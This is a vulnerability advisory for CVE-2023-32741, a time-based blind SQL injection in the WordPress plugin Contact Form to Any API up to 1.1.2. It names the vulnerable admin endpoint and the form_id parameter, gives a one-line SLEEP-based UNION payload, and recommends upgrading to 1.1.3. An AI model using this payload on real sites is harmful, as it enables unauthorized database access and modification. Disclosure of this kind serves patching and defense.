CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
HIGH
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
AI Score
Confidence
Low
EPSS
Percentile
19.3%
WordPress Contact Form to Any API plugin version 1.1.2 suffers from a remote SQL injection vulnerability.
# Exploit Title: WP Plugins Contact Form to Any API <= 1.1.2 - SQL Injection
# Exploit Author: Arvandy
# Software Link: https://wordpress.org/plugins/contact-form-to-any-api/
# Vendor Homepage: https://www.itpathsolutions.com/
# Version: 1.1.2
# Tested on: Windows, Linux
# CVE: CVE-2023-32741
# Product Description
Contact form 7 to Any API is most powerful plugin to send cf7 data to any third party services. It can be use to send data to CRM or any REST API. Easy to use and User friendly settings. It also Save Contact Form 7 form submitted data to the database with advanced features like search and export data to csv or excel.
# Vulnerability overview
The Wordpress plugins Contact Form to Any API <= 1.1.2 is vulnerable to Blind SQL Injection (time-based) via the form_id parameter on the /wp-admin/edit.php endpoint. This vulnerability could lead to unauthorized data access and modification.
# Proof of Concept
Affected Endpoint: /wp-admin/edit.php?post_type=cf7_to_any_api&page=cf7anyapi_entries&form_id=
Affected Parameter: form_id
payload: 1 UNION SELECT NULL,NULL,NULL,NULL,NULL,SLEEP(5)-- -
# Recommendation
Upgrade to version 1.1.3
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
HIGH
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
AI Score
Confidence
Low
EPSS
Percentile
19.3%